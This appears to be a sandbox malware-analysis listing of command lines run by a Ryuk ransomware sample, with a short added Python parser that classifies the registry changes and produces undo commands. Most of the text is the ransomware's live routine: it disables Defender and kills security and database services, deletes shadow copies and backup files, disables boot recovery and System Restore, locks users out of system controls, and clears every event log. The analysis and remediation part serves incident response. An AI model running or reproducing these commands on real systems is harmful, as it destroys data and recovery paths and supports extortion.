C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\ProgramData\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop avpsus /y

C:\Windows\system32\net.exe

net stop avpsus /y

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y

C:\Windows\system32\net.exe

net stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop mfewc /y

C:\Windows\system32\net.exe

net stop mfewc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y

C:\Windows\system32\net.exe

net stop BMR Boot Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net.exe

net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY start=disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled

C:\Windows\system32\sc.exe

sc config SQLWriter start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled

C:\Windows\system32\sc.exe

sc config SstpSvc start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mspub.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del %0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
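The reg add commands above fall into a few groups: HKCU Explorer and System policies that lock the user out of Run, logoff, lock, password change and the network UI; the NonEnum entry that hides the Recycle Bin (that CLSID is the Recycle Bin namespace object); HKLM policies that turn off System Restore, WinRE setup and the Windows Backup client and server UI; and an Enable=0 on a provider under the EventLog-System autologger session. The parser below is an added example for this report, not sandbox output or Ryuk code: it pulls hive, key, value and data out of each command line, labels the effect from a hand-written table covering only the keys seen in this listing, and emits the inverse command for remediation. The sample command lines are copied from the listing plus one constructed harmless one; the effect labels are this example's own.

```python
"""Parse `reg add` command lines, name the policy effect, and emit the
inverse command for remediation.

Added example for this report, not sandbox output. The effect table is a
hand-written subset covering the keys and values seen in the listing;
anything else comes back as 'unclassified'.
"""
import re

REG_ADD = re.compile(
    r'\breg(?:\.exe)?\s+add\s+(?:"(?P<qkey>[^"]+)"|(?P<key>\S+))\s+/v\s+(?P<value>\S+)'
    r'\s+/t\s+(?P<type>\w+)\s+/d\s+(?P<data>\S+)', re.I)

HIVES = {"hkey_current_user": "HKCU", "hkcu": "HKCU",
         "hkey_local_machine": "HKLM", "hklm": "HKLM"}

# (regex on the lower-cased key path, regex on the lower-cased value name, label)
EFFECTS = [
    (r"policies\\microsoft\\windows nt\\systemrestore$", r"^(disablesr|disableconfig)$",
     "system_restore_disabled"),
    (r"policies\\microsoft\\windows\\winre$", r"^disablesetup$", "winre_disabled"),
    (r"policies\\microsoft\\windows\\backup\\client$", r"^disable",
     "windows_backup_client_disabled"),
    (r"policies\\microsoft\\windows\\backup\\server$", r"^(no|onlysystembackup)",
     "windows_backup_server_restricted"),
    (r"control\\wmi\\autologger\\eventlog-system\\\{[0-9a-f-]+\}$", r"^enable$",
     "eventlog_trace_provider_disabled"),
    (r"currentversion\\policies\\nonenum$", r"^\{645ff040-5081-101b-9f08-00aa002f954e\}$",
     "recycle_bin_hidden"),
    (r"currentversion\\policies\\system$",
     r"^(disablechangepassword|disablelockworkstation|nologoff|nodispcpl)$",
     "session_controls_removed"),
    (r"(currentversion\\policies\\explorer|policies\\microsoft\\windows\\explorer)$",
     r"^(no|hidesca|taskbarno)", "explorer_ui_locked_down"),
    (r"policies\\microsoft\\appv\\client\\virtualization$", r"^enabledynamicvirtualization$",
     "appv_dynamic_virtualization_disabled"),
]


def undo_command(rec):
    """Inverse command. Policy values are absent on a default system, so
    deleting them restores the default; the autologger Enable value existed
    before (1), so it is written back rather than deleted."""
    key = rec["hive"] + "\\" + rec["path"]
    quoted = '"%s"' % key if " " in key else key
    if rec["effect"] == "eventlog_trace_provider_disabled":
        return "reg add %s /v %s /t REG_DWORD /d 1 /f" % (quoted, rec["value"])
    return "reg delete %s /v %s /f" % (quoted, rec["value"])


def parse_reg_add(cmdline):
    """Return a dict for a reg add command line, or None if it is not one."""
    m = REG_ADD.search(cmdline)
    if not m:
        return None
    raw_key = m.group("qkey") or m.group("key")
    hive, _, path = raw_key.partition("\\")
    rec = {"hive": HIVES.get(hive.lower(), hive.upper()), "path": path,
           "value": m.group("value"), "type": m.group("type").upper(),
           "data": m.group("data"), "effect": "unclassified"}
    lpath, lvalue = path.lower(), rec["value"].lower()
    for key_re, value_re, label in EFFECTS:
        if re.search(key_re, lpath) and re.search(value_re, lvalue):
            rec["effect"] = label
            break
    rec["undo"] = undo_command(rec)
    return rec


def summarize(cmdlines):
    """Count parsed reg add commands by effect label."""
    counts = {}
    for c in cmdlines:
        rec = parse_reg_add(c)
        if rec:
            counts[rec["effect"]] = counts.get(rec["effect"], 0) + 1
    return counts


SAMPLE_CMDLINES = [
    r'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f',
    r'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f',
    r'reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f',
    r'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f',
    r'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f',
    r'reg add HKCU\Software\Example\Harmless /v Foo /t REG_SZ /d bar /f',  # constructed, benign
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        rec = parse_reg_add(c)
        print(rec["effect"], "->", rec["undo"])
    print(summarize(SAMPLE_CMDLINES))
```

The undo list is for a host that has already been isolated and imaged; running it earlier destroys the registry evidence of what was changed. Note also that the inverse of a policy that never existed is deletion, not setting it to 0, which is why the table distinguishes the autologger Enable value.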

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wevtutil.exe el

C:\Windows\system32\wevtutil.exe

wevtutil.exe el
